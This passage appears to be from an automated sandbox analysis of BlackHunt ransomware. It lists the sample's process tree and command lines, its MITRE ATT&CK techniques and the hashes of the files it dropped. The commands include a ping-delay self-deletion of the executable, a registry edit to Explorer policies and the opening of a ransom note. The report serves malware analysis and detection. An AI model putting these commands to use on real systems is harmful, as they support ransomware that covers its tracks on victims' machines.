C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:17416
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:18164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe"2⤵PID:17612
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:17868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:15752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:17948
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6236
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8888
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:11984
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:9940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 18136 -ip 181361⤵PID:18096
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b4b6db176fa14a6dc47255d12232a427
SHA1e628ca512db751c88994c9c0e00df9a552e0d7a6
SHA2564c2b2183463a39b431e54f1bf857f59b9443df2343607fe31e5f5a45df1414e0
SHA5122e81541948c350a4ee104d5626255855adb4bcd2663cfe6e4408dd08823679f7475590cd8d4393664353dad7d433a541b41a80e2e920964ec67aeec2bd50131e
-
Filesize
12KB
MD5e7ef462f494df2b92e9186ee19e7e448
SHA1404e5394f3981e079a05c0f7e7691a9e481f4061
SHA256aa5ec698c2cf10353f001f812c5224dea9b60c5d13ab98ee7b497f3399ad9555
SHA5126a2dfe3d315b89828b0d7c4aeaaaf98fc64cb6946e0f66ba023bd47303ed1f1c956249261ef2fb38f1851b51715183a45a6f1f3f2e5f9b62ee4710754bdc8b17
-
Filesize
12KB
MD5f952029f219a894626e36d521b5602e8
SHA1f515bc5ccb69ad3e24da961c98e53135f605417c
SHA2563865ef63392d4d092f8722fa114d74fd9b49f71efba200521be8050d24e8a5d5
SHA512f248aacdb718de376ae6eeada8abf7dddb58ae281b28dc92973125cb27dde57ac7ba207ed3cb03007396138d51429077ab5fe1cb85a1c67a489bd4f5ac0bf03a
-
Filesize
684B
MD59b5c610e3e89868a75e84e2615fcd558
SHA103d737a3fd91c4f04f986fc2e4f833f6793a8953
SHA256a1251499146dbfc255883e13148246181a179fdcc6fe56d20cb835b8c36f0a86
SHA512c911ad0763f65a7b3c8772e3dd95f598713e8b60c5799936551e418ea5e6c5296cc22bc7e7a6204190158c46ff67ede6fd64525fa31768567dc1c6aed17754b9